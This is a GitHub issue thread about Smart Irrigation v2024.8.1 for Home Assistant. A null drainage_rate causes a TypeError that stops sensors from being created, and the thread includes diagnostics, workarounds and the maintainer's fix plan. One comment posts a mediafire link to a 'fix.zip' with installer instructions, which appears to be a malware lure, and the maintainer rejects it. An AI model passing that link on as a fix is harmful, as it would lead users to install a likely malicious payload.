### ISSUE TITLE
Sensors not created after upgrade to v2024.8.1 and draining rates are not set

### ISSUE THREAD

**Issue by m-l** [jeroenterheerdt/HAsmartirrigation#480]
### What happened?

Irrigation sensors are no longer created in HA, due to crash in the code like this:
`
2024-08-26 00:40:16.371 ERROR (MainThread) [homeassistant.components.sensor] Error adding entity sensor.smart_irrigation_zone_trees_front for domain sensor with platform smart_irrigation
Traceback (most recent call last):
  File "/usr/src/homeassistant/homeassistant/helpers/entity_platform.py", line 598, in _async_add_entities
    await coro
  File "/usr/src/homeassistant/homeassistant/helpers/entity_platform.py", line 912, in _async_add_entity
    await entity.add_to_platform_finish()
  File "/usr/src/homeassistant/homeassistant/helpers/entity.py", line 1366, in add_to_platform_finish
    self.async_write_ha_state()
  File "/usr/src/homeassistant/homeassistant/helpers/entity.py", line 1005, in async_write_ha_state
    self._async_write_ha_state()
  File "/usr/src/homeassistant/homeassistant/helpers/entity.py", line 1130, in _async_write_ha_state
    self.__async_calculate_state()
  File "/usr/src/homeassistant/homeassistant/helpers/entity.py", line 1071, in __async_calculate_state
    if extra_state_attributes := self.extra_state_attributes:
                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/config/custom_components/smart_irrigation/sensor.py", line 204, in extra_state_attributes
    "drainage_rate": float(self._drainage_rate),
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: float() argument must be a string or a real number, not 'NoneType'
`

### How to reproduce

It happens at HA 2024.8.3 startup.

### Relevant log output

```shell
Diagnostics:

`
{
  "home_assistant": {
    "installation_type": "Home Assistant Supervised",
    "version": "2024.8.3",
    "dev": false,
    "hassio": true,
    "virtualenv": false,
    "python_version": "3.12.4",
    "docker": true,
    "arch": "aarch64",
    "timezone": "Europe/Warsaw",
    "os_name": "Linux",
    "os_version": "6.6.30-v8+",
    "supervisor": "2024.08.0",
    "host_os": "Raspbian GNU/Linux 10 (buster)",
    "docker_version": "26.1.4",
    "chassis": "",
    "run_as_root": true
  },
  "custom_components": {
    "custom_templates": {
      "documentation": "https://github.com/PiotrMachowski/Home-Assistant-custom-components-Custom-Templates",
      "version": "v1.4.0",
      "requirements": []
    },
    "auto_backup": {
      "documentation": "https://github.com/jcwillox/hass-auto-backup",
      "version": "1.5.0",
      "requirements": []
    },
    "hikvision_next": {
      "documentation": "https://github.com/maciej-or/hikvision_next",
      "version": "1.0.17",
      "requirements": [
        "xmltodict==0.13.0",
        "hikvisionapi==0.3.2",
        "requests-toolbelt==1.0.0"
      ]
    },
    "rozkladzik": {
      "documentation": "https://github.com/PiotrMachowski/Home-Assistant-custom-components-Rozkladzik",
      "version": "v1.1.5",
      "requirements": [
        "requests"
      ]
    },
    "places": {
      "documentation": "https://github.com/custom-components/places",
      "version": "v2.7.1",
      "requirements": []
    },
    "sonoff": {
      "documentation": "https://github.com/AlexxIT/SonoffLAN",
      "version": "3.7.3",
      "requirements": [
        "pycryptodome>=3.6.6"
      ]
    },
    "alexa_media": {
      "documentation": "https://github.com/alandtse/alexa_media_player/wiki",
      "version": "4.12.11",
      "requirements": [
        "alexapy==1.28.2",
        "packaging>=20.3",
        "wrapt>=1.14.0"
      ]
    },
    "hacs": {
      "documentation": "https://hacs.xyz/docs/configuration/start",
      "version": "2.0.0",
      "requirements": [
        "aiogithubapi>=22.10.1"
      ]
    },
    "samsung_soundbar": {
      "documentation": "https://github.com/IDmedia/hass-samsung_soundbar",
      "version": "1.0.0",
      "requirements": [
        "xmltodict==0.11.0"
      ]
    },
    "samsungtv_smart": {
      "documentation": "https://github.com/ollo69/ha-samsungtv-smart",
      "version": "0.13.5",
      "requirements": [
        "websocket-client!=1.4.0,>=0.58.0",
        "wakeonlan>=2.0.0",
        "aiofiles>=0.8.0",
        "casttube>=0.2.1"
      ]
    },
    "smart_irrigation": {
      "documentation": "https://github.com/jeroenterheerdt/HASmartIrrigation",
      "version": "v2024.8.1",
      "requirements": []
    },
    "presence_simulation": {
      "documentation": "https://github.com/slashback100/presence_simulation",
      "version": "4.9",
      "requirements": []
    },
    "upnp_availability": {
      "documentation": "https://github.com/rytilahti/homeassistant-upnp-availability/",
      "version": "0.0.3",
      "requirements": [
        "async_upnp_client>=0.33"
      ]
    },
    "sems": {
      "documentation": "https://github.com/TimSoethout/goodwe-sems-home-assistant",
      "version": "5.0.0",
      "requirements": []
    },
    "sds011": {
      "documentation": "https://github.com/mrk-its/homeassistant-sds011",
      "version": "0.1.0",
      "requirements": [
        "py-sds011==0.9"
      ]
    },
    "var": {
      "documentation": "https://github.com/snarky-snark/home-assistant-variables/blob/master/README.md",
      "version": "0.15.5",
      "requirements": []
    },
    "mikrotik_router": {
      "documentation": "https://github.com/tomaae/homeassistant-mikrotik_router",
      "version": "0.0.0",
      "requirements": [
        "librouteros>=3.2.0",
        "mac-vendor-lookup>=0.1.12"
      ]
    },
    "goodwe": {
      "documentation": "https://github.com/mletenay/home-assistant-goodwe-inverter",
      "version": "0.9.9.27",
      "requirements": [
        "goodwe==0.4.7"
      ]
    },
    "burze_dzis_net": {
      "documentation": "https://github.com/PiotrMachowski/Home-Assistant-custom-components-Burze.dzis.net",
      "version": "v2.0.1",
      "requirements": [
        "suds"
      ]
    },
    "localtuya": {
      "documentation": "https://github.com/rospogrigio/localtuya/",
      "version": "5.2.1",
      "requirements": []
    },
    "deutschebahn": {
      "documentation": "https://github.com/faserf/ha-deutschebahn#readme",
      "version": "3.0.2",
      "requirements": [
        "schiene==0.26"
      ]
    },
    "energyscore": {
      "documentation": "https://github.com/knudsvik/energyscore",
      "version": "1.3.3",
      "requirements": []
    },
    "weatherapi": {
      "documentation": "https://github.com/iprak/weatherapi",
      "version": "1.1.5",
      "requirements": []
    },
    "thermal_comfort": {
      "documentation": "https://github.com/dolezsa/thermal_comfort/blob/master/README.md",
      "version": "2.2.2",
      "requirements": []
    },
    "average": {
      "documentation": "https://github.com/Limych/ha-average",
      "version": "2.3.4",
      "requirements": []
    },
    "cover_time_based": {
      "documentation": "https://github.com/Sese-Schneider/ha-cover-time-based",
      "version": "2.1.1",
      "requirements": [
        "xknx==0.9.4"
      ]
    },
    "holidays": {
      "documentation": "https://github.com/bruxy70/Holidays/",
      "version": "1.9.10",
      "requirements": [
        "python-dateutil>=2.8.2",
        "holidays>=0.35"
      ]
    },
    "watchman": {
      "documentation": "https://github.com/dummylabs/thewatchman",
      "version": "0.6.3",
      "requirements": [
        "prettytable==3.10.0"
      ]
    },
    "config_editor": {
      "documentation": "https://github.com/junkfix/config-editor-card",
      "version": "4.4",
      "requirements": []
    },
    "meteoalarm_m": {
      "documentation": "https://github.com/kodi1/meteoalarm",
      "version": "0.0.1",
      "requirements": []
    },
    "mhz19": {
      "documentation": "https://www.home-assistant.io/integrations/mhz19",
      "version": "1.1.1",
      "requirements": [
        "pmsensor==0.4"
      ]
    }
  },
  "integration_manifest": {
    "domain": "smart_irrigation",
    "name": "Smart Irrigation",
    "codeowners": [
      "jeroenterheerdt"
    ],
    "config_flow": true,
    "dependencies": [
      "http",
      "panel_custom"
    ],
    "documentation": "https://github.com/jeroenterheerdt/HASmartIrrigation",
    "iot_class": "local_push",
    "issue_tracker": "https://github.com/jeroenterheerdt/HASmartIrrigation/issues",
    "requirements": [],
    "version": "v2024.8.1",
    "is_built_in": false
  },
  "setup_times": {
    "null": {
      "setup": 0.0001250910572707653
    },
    "4915303a10979d01dd7cba22caaeff56": {
      "wait_import_platforms": -9.714916449971497,
      "config_entry_setup": 9.861814589938149
    }
  },
  "data": {
    "use_weather_service": true,
    "weather_service": "Open Weather Map",
    "weather_service_api_key": "[redacted]",
    "store": {
      "config": {
        "calctime": "23:04",
        "units": "metric",
        "use_weather_service": true,
        "weather_service": "Open Weather Map",
        "autocalcenabled": true,
        "autoupdateenabled": true,
        "autoupdateschedule": "minutes",
        "autoupdatedelay": "0",
        "autoupdateinterval": "20",
        "autoclearenabled": true,
        "cleardatatime": "00:02",
        "starteventfiredtoday": false,
        "continuousupdates": false
      },
      "mappings": [
        {
          "id": 0,
          "name": "Default sensor group",
          "mappings": {
            "Dewpoint": {
              "source": "weather_service",
              "sensorentity": "",
              "unit": ""
            },
            "Evapotranspiration": {
              "source": "none",
              "sensorentity": "",
              "unit": ""
            },
            "Humidity": {
              "source": "sensor",
              "sensorentity": "sensor.external_humidity_max",
              "unit": "",
              "aggregate": "last"
            },
            "Precipitation": {
              "source": "sensor",
              "sensorentity": "sensor.rain_day_mm",
              "unit": ""
            },
            "Pressure": {
              "source": "sensor",
              "sensorentity": "sensor.real_pressure",
              "unit": "",
              "pressure_type": "relative",
              "aggregate": "last"
            },
            "Solar Radiation": {
              "source": "none",
              "sensorentity": "",
              "unit": ""
            },
            "Temperature": {
              "source": "sensor",
              "sensorentity": "sensor.external_temp_minimum",
              "unit": "",
              "aggregate": "last"
            },
            "Windspeed": {
              "source": "sensor",
              "sensorentity": "sensor.wind_gustspeed",
              "unit": "",
              "aggregate": "average"
            },
            "Current Precipitation": {}
          },
          "data": [
            {
              "Windspeed": 2.4,
              "Pressure": 1020.6000053484881,
              "Humidity": 70.0,
              "Temperature": 21.7,
              "Dewpoint": 15.35,
              "Precipitation": 0.0,
              "retrieved": "2024-08-26T00:21:17.401328"
            },
            {
              "Windspeed": 3.754714397343079,
              "Pressure": 1021.0000107011687,
              "Humidity": 70,
              "Temperature": 20.68,
              "Dewpoint": 15.02,
              "Current Precipitation": 0.0,
              "Precipitation": 0.0,
              "retrieved": "2024-08-26T00:30:51.074095"
            },
            {
              "Windspeed": 1.4,
              "Pressure": 1020.7000053490121,
              "Humidity": 70.0,
              "Temperature": 21.6,
              "Dewpoint": 14.99,
              "Current Precipitation": 0.0,
              "Precipitation": 0.0,
              "retrieved": "2024-08-26T00:33:07.993416"
            },
            {
              "Windspeed": 3.754714397343079,
              "Pressure": 1021.0000107011687,
              "Humidity": 70,
              "Temperature": 20.57,
              "Dewpoint": 14.91,
              "Current Precipitation": 0.0,
              "Precipitation": 0.0,
              "retrieved": "2024-08-26T00:40:06.970787"
            }
          ],
          "data_last_updated": "2024-08-26T00:40:06.970867",
          "data_last_entry": {}
        }
      ],
      "modules": [
        {
          "id": 0,
          "name": "PyETO",
          "description": "Calculate duration based on the FAO56 calculation from the PyETO library.",
          "config": {
            "forecast_days": 0,
            "solrad_behavior": "4"
          },
          "schema": [
            {
              "type": "boolean",
              "name": "coastal",
              "optional": true,
              "default": false
            },
            {
              "type": "select",
              "options": [
                [
                  "1",
                  "EstimateFromTemp"
                ],
                [
                  "2",
                  "EstimateFromSunHours"
                ],
                [
                  "3",
                  "DontEstimate"
                ],
                [
                  "4",
                  "EstimateFromSunHoursAndTemperature"
                ]
              ],
              "name": "solrad_behavior",
              "required": true,
              "default": {
                "__type": "<enum 'SOLRAD_behavior'>",
                "repr": "<SOLRAD_behavior.EstimateFromTemp: '1'>"
              }
            },
            {
              "type": "integer",
              "name": "forecast_days",
              "optional": true,
              "default": 0
            }
          ]
        }
      ],
      "zones": [
        {
          "id": 1,
          "name": "zone_trees_front",
          "size": 300.0,
          "throughput": 50.0,
          "state": "automatic",
          "bucket": -3.9500160884987445,
          "old_bucket": 0,
          "delta": -3.9500160884987445,
          "duration": 1422,
          "module": 0,
          "multiplier": 1.0,
          "explanation": null,
          "mapping": 0,
          "lead_time": 0.0,
          "maximum_duration": 1800.0,
          "maximum_bucket": 50,
          "last_calculated": "2024-08-25T23:04:00.261496",
          "last_updated": "2024-08-26T00:40:06.970867",
          "number_of_data_points": 3,
          "drainage_rate": null
        },
        {
          "id": 2,
          "name": "zone_backyard",
          "size": 300.0,
          "throughput": 50.0,
          "state": "automatic",
          "bucket": -3.9500160884987445,
          "old_bucket": 0,
          "delta": -3.9500160884987445,
          "duration": 1422,
          "module": 0,
          "multiplier": 1.0,
          "explanation": null,
          "mapping": 0,
          "lead_time": 0.0,
          "maximum_duration": 1800.0,
          "maximum_bucket": 50,
          "last_calculated": "2024-08-25T23:04:00.315746",
          "last_updated": "2024-08-26T00:40:06.970867",
          "number_of_data_points": 3,
          "drainage_rate": null
        },
        {
          "id": 3,
          "name": "zone_eden",
          "size": 250.0,
          "throughput": 40.0,
          "state": "automatic",
          "bucket": -3.9500160884987445,
          "old_bucket": 0,
          "delta": -3.9500160884987445,
          "duration": 1481,
          "module": 0,
          "multiplier": 1.0,
          "explanation": null,
          "mapping": 0,
          "lead_time": 0.0,
          "maximum_duration": 1800.0,
          "maximum_bucket": 50,
          "last_calculated": "2024-08-25T23:04:00.371984",
          "last_updated": "2024-08-26T00:40:06.970867",
          "number_of_data_points": 3,
          "drainage_rate": null
        },
        {
          "id": 4,
          "name": "zone_lawn",
          "size": 120.0,
          "throughput": 40.0,
          "state": "automatic",
          "bucket": -3.9500160884987445,
          "old_bucket": 0,
          "delta": -3.9500160884987445,
          "duration": 711,
          "module": 0,
          "multiplier": 1.0,
          "explanation": null,
          "mapping": 0,
          "lead_time": 0.0,
          "maximum_duration": 3600.0,
          "maximum_bucket": 50,
          "last_calculated": "2024-08-25T23:04:00.445880",
          "last_updated": "2024-08-26T00:40:06.970867",
          "number_of_data_points": 3,
          "drainage_rate": null
        },
        {
          "id": 5,
          "name": "zone_trees_back ",
          "size": 250.0,
          "throughput": 40.0,
          "state": "automatic",
          "bucket": -3.9500160884987445,
          "old_bucket": 0,
          "delta": -3.9500160884987445,
          "duration": 1481,
          "module": 0,
          "multiplier": 1.0,
          "explanation": null,
          "mapping": 0,
          "lead_time": 0.0,
          "maximum_duration": 1800.0,
          "maximum_bucket": 50,
          "last_calculated": "2024-08-25T23:04:00.499908",
          "last_updated": "2024-08-26T00:40:06.970867",
          "number_of_data_points": 3,
          "drainage_rate": null
        },
        {
          "id": 6,
          "name": "zone_trees_middle",
          "size": 100.0,
          "throughput": 40.0,
          "state": "automatic",
          "bucket": -3.9500160884987445,
          "old_bucket": 0,
          "delta": -3.9500160884987445,
          "duration": 593,
          "module": 0,
          "multiplier": 1.0,
          "explanation": null,
          "mapping": 0,
          "lead_time": 0.0,
          "maximum_duration": 1800.0,
          "maximum_bucket": 50,
          "last_calculated": "2024-08-25T23:04:00.552971",
          "last_updated": "2024-08-26T00:40:06.970867",
          "number_of_data_points": 3,
          "drainage_rate": null
        }
      ]
    }
  }
}
`
```

### Which version are you running?

 v2024.8.1

### Diagnostics file

- [X] I have attached a diagnostics file

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by jeroenterheerdt** [comment]
> Download https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file In the installer menu, select "gcc."

Ehh, no.

**Comment by jeroenterheerdt** [comment]
@m-l thanks this is a bug.

**Comment by UweTo** [comment]
> @m-l thanks this is a bug. As a workaround disable that line for now.

Which line ?

**Comment by richardstone** [comment]
This is applicable to all of my zones after the upgrade.

**Comment by clau-bucur** [comment]
> > @m-l thanks this is a bug. As a workaround disable that line for now.
> 
> Which line ?

custom_components/smart_irrigation/sensor.py - line 204
![image](https://github.com/user-attachments/assets/d4590d75-0323-4723-aa44-b3e7b6c0154a)

**Comment by FabianGabor** [comment]
> > > @m-l thanks this is a bug. As a workaround disable that line for now.
> > 
> > 
> > Which line ?
> 
> custom_components/smart_irrigation/sensor.py - line 204 ![image](https://private-user-images.githubusercontent.com/47672949/361386616-d4590d75-0323-4723-aa44-b3e7b6c0154a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2Njk5ODEsIm5iZiI6MTcyNDY2OTY4MSwicGF0aCI6Ii80NzY3Mjk0OS8zNjEzODY2MTYtZDQ1OTBkNzUtMDMyMy00NzIzLWFhNDQtYjNlN2I2YzAxNTRhLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDEwNTQ0MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQyZjRmMzA1Y2YwZGJkYWNiYTE4OWI2MDhjNDUxNzQ3M2M1MjM3NTYxYTlmMjA0M2ZlZGJmYTk5Njc5ZGM4YjAmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.PlD3CLtKw4GSOsikNmLKZtpL0QmI3vLcT_cG84sfulc)

No need. Just set drainage rate in the Zones config.

![drainage_rate](https://github.com/user-attachments/assets/ce0f5cf0-2a9f-49f6-9f89-54c353465672)

**Comment by richardstone** [comment]
Correct. Issues went away.
Maybe it would be worth mentioning this in the changelog.

**Comment by jeroenterheerdt** [comment]
I actually pulled the release and will release a fix shortly.
